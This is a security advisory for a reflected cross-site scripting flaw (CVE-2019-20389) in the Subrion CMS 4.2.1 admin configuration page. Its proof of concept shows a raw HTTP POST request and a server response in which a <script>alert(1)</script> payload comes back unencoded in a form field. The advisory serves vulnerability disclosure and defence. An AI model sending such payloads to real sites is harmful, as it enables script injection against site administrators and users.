Subrion CMS 4.2.1 Cross Site Scripting

Subrion CMS version 4.2.1 suffers from a cross site scripting vulnerability.

MD5 | 5e20656542f5331dcaf26c0ed1c37ba7

# Title: Subrion CMS 4.2.1 Cross-Site Scripting (XSS)
# Date: 02-12-2019
# Author: Christian Bortone
# Contact: [email protected]
# Vendor Homepage:
# Vulnerable Product: Subrion CMS 4.2.1
# CVE : CVE-2019-20389

1. Description:

A cross-site scripting vulnerability was identified in Subrion CMS settings page. A remote attacker can inject arbitrary Javascript code in the multipart/form-data, which is reflected back within a user's browser without proper output encoding.

2. Proof of Concept:


POST /subrion/panel/configuration/general/ HTTP/1.1
Host: localhost
Content-Length: 2270
Cache-Control: max-age=0
Origin: http://localhost
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryYsVEcg0mHqDrQoAg
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.0 Safari/537.36 autochrome/red
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://localhost/subrion/panel/configuration/general/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: INTELLI_64e9af8d7f=9d3b0b32b40a06ddf509f7e646e29397; loader=loaded
Connection: close


Content-Disposition: form-data; name="v[language_switch]"




HTTP/1.1 200 OK
Date: Mon, 02 Dec 2019 19:04:08 GMT
Server: Apache/2.4.39 (Unix) OpenSSL/1.0.2s PHP/7.1.30 mod_perl/2.0.8-dev Perl/v5.16.3
X-Powered-By: PHP/7.1.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: INTELLI_64e9af8d7f=bc8d4b54fe37565e2ca7f4521c05ecb5; expires=Mon, 02-Dec-2019 19:34:08 GMT; Max-Age=1800; path=/
X-Robots-Tag: noindex
Vary: Accept-Encoding
Content-Length: 104140
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE html>
<html lang="en" dir="ltr">


<input type="checkbox" name="v[language_switch]" id="language_switch" value=""><script>alert(1)</script>" checked>


Related Posts